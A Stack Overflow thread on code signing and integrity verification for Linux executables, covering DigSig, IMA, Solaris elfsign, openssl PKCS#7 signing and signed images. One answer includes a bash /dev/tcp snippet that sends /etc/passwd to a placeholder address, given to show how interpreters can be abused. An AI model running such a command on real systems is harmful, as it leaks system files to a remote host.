Signed executables under Linux

Submitted by [亡魂溺海] on 2019-11-26 19:11:55

Question


For security reasons, it is desirable to check the integrity of code before execution, to avoid running software that has been tampered with by an attacker. So, my question is:

How to sign executable code and run only trusted software under Linux?

I have read the work of van Doorn et al., Design and implementation of signed executables for Linux, and IBM's TLC (Trusted Linux Client) by Safford & Zohar. TLC uses the TPM, which is nice, but the paper is from 2005 and I was unable to find current alternatives.

Do you know of any other options?

UPDATE: What about other OSes? OpenSolaris? The BSD family?


Answer 1:


The DigSig kernel module implements verification of binaries signed by a tool called bsign. However, there hasn't been any work on it since version 2.6.21 of the Linux kernel.
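
For reference, bsign embeds a GnuPG signature into a section of the ELF binary and DigSig checks it in the kernel at exec time. From memory the userspace side looked roughly like the following; the exact option names may differ between bsign versions, so treat them as an assumption and check bsign(1):

$ bsign --sign /usr/local/bin/myprog      # rewrite the binary with an embedded GnuPG signature
$ bsign --verify /usr/local/bin/myprog    # userspace check of the embedded signature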




Answer 2:


I realize this is an ancient question but I just now found it.

I wrote signed executable support for the Linux kernel (around version 2.4.3) a while back, and had the entire toolchain in place for signing executables, checking the signatures at execve(2) time, caching the signature validation information (clearing the validation when the file was opened for writing or otherwise modified), embedding the signatures into arbitrary ELF programs, etc. It did introduce some performance penalties upon the first execution of every program (because the kernel had to load in the entire file, rather than just demand-page the needed pages) but once the system was in a steady-state, it worked well.
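
For illustration only (this is not the toolchain described above), the ELF-embedding part can be approximated today with standard binutils and OpenSSL. The section name .sig, the key file names, and signing only the .text section are simplifications chosen for this sketch; a real scheme would cover all loadable segments:

$ objcopy -O binary --only-section=.text prog prog.text             # pull out the code the signature will cover
$ openssl dgst -sha256 -sign privkey.pem -out prog.text.sig prog.text
$ objcopy --add-section .sig=prog.text.sig prog prog.signed         # embed the detached signature as an extra ELF section
# later, to check: extract both pieces again and verify
$ objcopy -O binary --only-section=.text prog.signed check.text
$ objcopy -O binary --only-section=.sig  prog.signed check.sig
$ openssl dgst -sha256 -verify pubkey.pem -signature check.sig check.text && echo OK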

But we decided to stop pursuing it because it faced several problems that were too large to justify the complexity:

  • We had not yet built support for signed libraries. Signed libraries would also require modifying the ld.so loader and the dlopen(3) mechanism. This wasn't impossible but did complicate the interface: should we have the loader ask the kernel to validate a signature, or should the computation be done entirely in userspace? How would one protect against a strace(2)d process if this portion of the validation is done in userspace? Would we be forced to forbid strace(2) entirely on such a system?

    What would we do about programs that supply their own loader?

  • A great many programs are written in languages that do not compile to ELF objects. We would need to provide language-specific modifications to bash, perl, python, java, awk, sed, and so on, for each of the interpreters to be able to also validate signatures. Since most of these programs are free-format plain text they lack the structure that made embedding digital signatures into ELF object files so easy. Where would the signatures be stored? In the scripts? In extended attributes? In an external database of signatures?

  • Many interpreters are wide open about what they allow; bash(1) can communicate with remote systems entirely on its own using echo and /dev/tcp (see the sketch after this list), and can easily be tricked into executing anything an attacker needs done. Signed or not, you couldn't trust them once they were under the control of a hacker.

  • The prime motivator for signed executable support comes from rootkits replacing system-provided binaries such as /bin/ps and /bin/kill. Yes, there are other useful reasons to have signed executables. However, rootkits got significantly more impressive over time, with many relying on kernel hacks to hide their activities from administrators. Once the kernel has been hacked, the whole game is over. As a result of this sophistication, the tools we were hoping to prevent from being used were falling out of favor in the hacking community.

  • The kernel's module loading interface was wide open. Once a process had root privilege, it was easy to inject a kernel module without any checking. We could also have written a verifier for kernel modules, but the kernel's infrastructure around modules was very primitive.
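
To illustrate the point about interpreters: bash needs no external binaries to talk to the network, /dev/tcp redirection alone is enough (the address and port below are placeholders):

$ exec 3<>/dev/tcp/192.0.2.10/4444     # open a TCP connection from pure bash
$ cat /etc/passwd >&3                  # send whatever data the attacker wants
$ exec 3>&-                            # close the connection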




Answer 3:


The GNU/Linux/FOSS model actually encourages tampering -- of a sort. Users and distro-makers must be free to modify (tamper with) the software to suit their needs. Even just recompiling the software (without changing any source code) for customization is something that is done quite often, but would break binary code-signing. As a result, the binary code-signing model isn't particularly well suited to GNU/Linux/FOSS.

Instead, this kind of software relies more on generating signatures and/or secure hashes of the source packages. In combination with a reliable and trusted package distribution model, this can be made just as secure (if not more so, vis-à-vis transparency into the source code) as binary code-signing.
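
In practice this usually means checking the maintainer's detached GPG signature and the published checksums of a downloaded source package, along these lines (file names are placeholders):

$ gpg --verify foo-1.2.tar.gz.sig foo-1.2.tar.gz     # check the maintainer's detached signature
$ sha256sum -c SHA256SUMS                            # check the published hashes of the downloaded files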




Answer 4:


Have a look at this: http://linux-ima.sourceforge.net/

It's not signing yet, but it still enables verification.
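
For example, once IMA measurement is enabled (via an ima_policy= style kernel boot parameter; the exact parameter name depends on the kernel version), the measurement list can be read from securityfs and compared against known-good hashes:

$ cat /sys/kernel/security/ima/ascii_runtime_measurements | head   # one line per measured file, including its hash and path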




Answer 5:


I can answer the question from a Solaris 10 & 11 OS perspective: all binaries are signed. To verify a signature, use 'elfsign':

$ elfsign verify -v /usr/bin/bash
elfsign: verification of /usr/bin/bash passed.
format: rsa_sha1.
signer: O=Oracle Corporation, OU=Corporate Object Signing, OU=Solaris Signed Execution, CN=Solaris 11.
signed on: Fri Oct 04 17:06:13 2013.
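
Signing your own objects uses the same tool; from memory the invocation is roughly the following, but check elfsign(1) for the exact options, and note that the key, cert, and binary paths here are placeholders:

$ elfsign sign -k mykey.pem -c mycert.pem -e /opt/myapp/bin/mytool
$ elfsign verify -v /opt/myapp/bin/mytool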

Oracle has recently added a verified boot process for Solaris 11 too; for details see Solaris Verified Boot Introduction.

There are some production-grade forks of the OpenSolaris code; three worth investigating are Illumos, SmartOS, and OmniOS.




Answer 6:


Take a look at Medusa DS9. I played with it a long (long) time ago, but if I remember correctly, you could register specific binaries and any modification to them would be blocked at the kernel level. Of course, it could be overridden with local access to the machine, but it was not really easy. There's a smart daemon called constable that checks everything happening on the machine, and if something out of the ordinary occurs, it starts screaming.




Answer 7:


I've never tried it, but take a look at http://blog.codenoise.com/signelf-digitally-signing-elf-binaries. The solution works without needing kernel support, and looks ready to go.

The code for the signer can be found at http://sourceforge.net/projects/signelf/

It does not solve the "run only trusted code on Linux" question, but it does partially solve the problem by giving a program a way to detect possible tampering or corruption of itself.




Answer 8:


http://en.wikipedia.org/wiki/PKCS

Sign it with a PKCS#7 (S/MIME) signature. Generate your own cert/private key pair, self-sign the cert, and then sign your file with the private key and cert using PKCS#7. This attaches the cert to the file, and the program can then check itself at runtime using the openssl command (see man smime or just run openssl help). This is tamperproof because even though the public key is in the files you give out, the S/MIME signature for that public key can only be generated with the private key, which you won't distribute. So if the file is signed by your cert, it must have been signed by someone with the private key, and since you didn't give the private key to anyone, it must have come from you.

Here's how to make the self-signed certificate.

http://www.akadia.com/services/ssh_test_certificate.html
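
The linked page goes through the details; a single command along these lines produces the private key and the self-signed cert in one go (file names and subject are placeholders):

$ openssl req -x509 -newkey rsa:2048 -nodes -days 3650 -subj "/CN=My Code Signing" -keyout signing.key -out signing.crt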

You'll have to convince openssl to trust your cert as a root of authority (-CAfile), then verify with that as the root, and also check that the cert attached to the file is yours (hash the cert and compare the hash). Note that although it isn't documented, the exit status of openssl reflects the validity of the signature you are checking when doing an smime verify: it's 0 if it matches, non-zero if it doesn't.
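
A minimal sketch of the sign/verify round trip, using your own cert as the trust root via -CAfile (file names are placeholders; openssl smime -sign produces a detached signature by default, and depending on your OpenSSL version you may need to relax the certificate purpose check, e.g. with -purpose any):

$ openssl smime -sign -binary -in myprog -signer signing.crt -inkey signing.key -outform PEM -out myprog.sig
$ openssl smime -verify -binary -content myprog -in myprog.sig -inform PEM -CAfile signing.crt -out /dev/null \
      && echo "signature OK" || echo "signature BAD"    # exit status is 0 only when the signature verifies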

Note that all of this is not fully secure, because if the check is in your own code, an attacker can simply remove the check to beat you. The only secure way to do it would be to have the checker in the OS, have it check your binary, and refuse to run it if it isn't signed. But since there is no such checker in the OS, and Linux can be modified to remove or bypass it anyway... what this is really good for is detecting corrupt files, more than keeping people from bypassing you.




Answer 9:


I agree that the philosophy surrounding Linux, GNU et al. revolves around tinkering. On the other hand, I also believe that some systems deserve protection against vulnerabilities such as software tampering, which can undermine the privacy and integrity of a system's users.

Kernel-based implementations cannot keep up with the rapid development cycle of the kernel itself. I recommend instead implementing a form of executable file signature verification using userspace tools. Place executables in an archive or filesystem image and sign the image using a private key; if that private key stays on your development machines (private), then even when your server gets hacked, attackers still have no way to sign their own images and inject their code without tricking the system into mounting unsigned images (see the sketch right after the following list). It extends further along the chain:

  • have your services contained into runtime-mounted read-only images;
  • have the machine run off of a signed, read-only filesystem;
  • implement secure boot on your machines, running a bootloader that enforces the integrity of the boot media;
  • trust that the people in your organization will not tamper with your machines.
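
A bare-bones sketch of the signed-image idea above, using a squashfs image and a detached OpenSSL signature (paths, key names, and mount point are placeholders; the public key would be extracted from the private key ahead of time, e.g. with openssl rsa -pubout):

$ mksquashfs /srv/app app.img -noappend                            # pack the service into a read-only image
$ openssl dgst -sha256 -sign deploy.key -out app.img.sig app.img   # sign it on the build machine
# on the server: refuse to mount anything that does not verify
$ openssl dgst -sha256 -verify deploy.pub -signature app.img.sig app.img \
      && mount -o loop,ro app.img /opt/app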

Getting everything right is a hard endeavor. It is much simpler to work around it all by designing your system under another approach:

  • quarantine users from the system. Do not introduce means for users to execute commands on your system. Avoid shelling out from inside the programs that rely on user-fed data.
  • design your deployment procedures using configuration management and ensure that your deployments are "repeatable", meaning that they lead to the same functional result when you deploy them several times. This allows you to "nuke from orbit" machines that you suspect have been compromised.
  • treat your machines as if they were compromised: regularly run audits to verify the integrity of your systems. Save your data on separate images and redeploy systems regularly. Sign images and have systems reject unsigned images.
  • use certificates: favor a "certificate pinning" approach. Do deploy a root certificate for your applications (which will provide automatic rejection of signatures that have not been certified by your organization) but at the very least have the system manage fingerprints of current images and notify administrators when fingerprints have changed. Although it is possible to implement all this using chains of keys, certificate-based authentication has been designed for this exact application.



Answer 10:


I like to think of security as a chain. The weakest link of the chain can compromise the whole system. So the whole thing becomes "preventing an unauthorized user from obtaining the root password".

As suggested by @DanMoulding, the source of the software is also important, and in the future official OS application stores will probably be the standard. Think of the Play Store, or the Apple and Microsoft stores.

I think the installation and distribution of covert malicious code is the far more insidious problem. After all, in order to load bad code, it first has to be installed on the system somewhere. More layers of security are usually better, of course. The question is: is it worth the cost?

In my opinion the answer is "it depends". You can reduce the risk by adopting a set of security policies as suggested by @sleblanc. You can encrypt your file system (https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup), use read-only file systems for the binaries or use a mechanism to sign and verify the binaries.

However, whatever mechanism you use, there is nothing you can do once root access has been obtained by an attacker. The signature verification tools can be replaced with a tampered version or simply disabled, and it doesn't really matter whether the tools run in user space or kernel space once the machine has been compromised (although the latter would be more secure, of course).

So it would be nice if the Linux kernel could embed a signature verification module and another security layer between the root user and the operating system.

For example, this is the approach adopted in recent macOS versions. Some files can't be modified (and sometimes not even read) by the root account, and there are also restrictions on policies and kernel modules (e.g. only signed or authorized kexts can be loaded on the system). Windows adopted more or less the same approach with AppLocker.



Source: https://stackoverflow.com/questions/1732927/signed-executables-under-linux
